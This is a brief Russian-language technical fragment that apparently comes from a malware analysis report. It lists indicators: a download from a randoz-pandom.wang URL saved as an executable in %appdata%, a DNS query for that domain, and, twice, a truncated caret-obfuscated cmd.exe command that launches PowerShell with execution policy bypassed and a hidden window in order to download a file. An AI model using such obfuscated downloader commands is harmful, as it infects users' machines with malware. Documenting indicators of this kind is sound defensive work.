Техническая информация
- http://randoz-pandom.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^oW^e^Rs^h^eL^L^.^e^x^e -^eX^e^CU^T^ioN^P^O^LICY^ bY^pA^s^s^ ^-^N^o^pRoF^il^e^ -^w^I^NDO^WStyLe ^H^iDD^en (^n^eW-o^bjECt^ sY^S^tEm^.N^ET^.wE^B^CLi^e^NT^).^Do^WnLoAD^fiLe('h...
- DNS ASK ra####-pandom.wang
- '<SYSTEM32>\cmd.exe' /c "p^oW^e^Rs^h^eL^L^.^e^x^e -^eX^e^CU^T^ioN^P^O^LICY^ bY^pA^s^s^ ^-^N^o^pRoF^il^e^ -^w^I^NDO^WStyLe ^H^iDD^en (^n^eW-o^bjECt^ sY^S^tEm^.N^ET^.wE^B^CLi^e^NT^).^Do^WnLoAD^fiLe('h...' (со скрытым окном)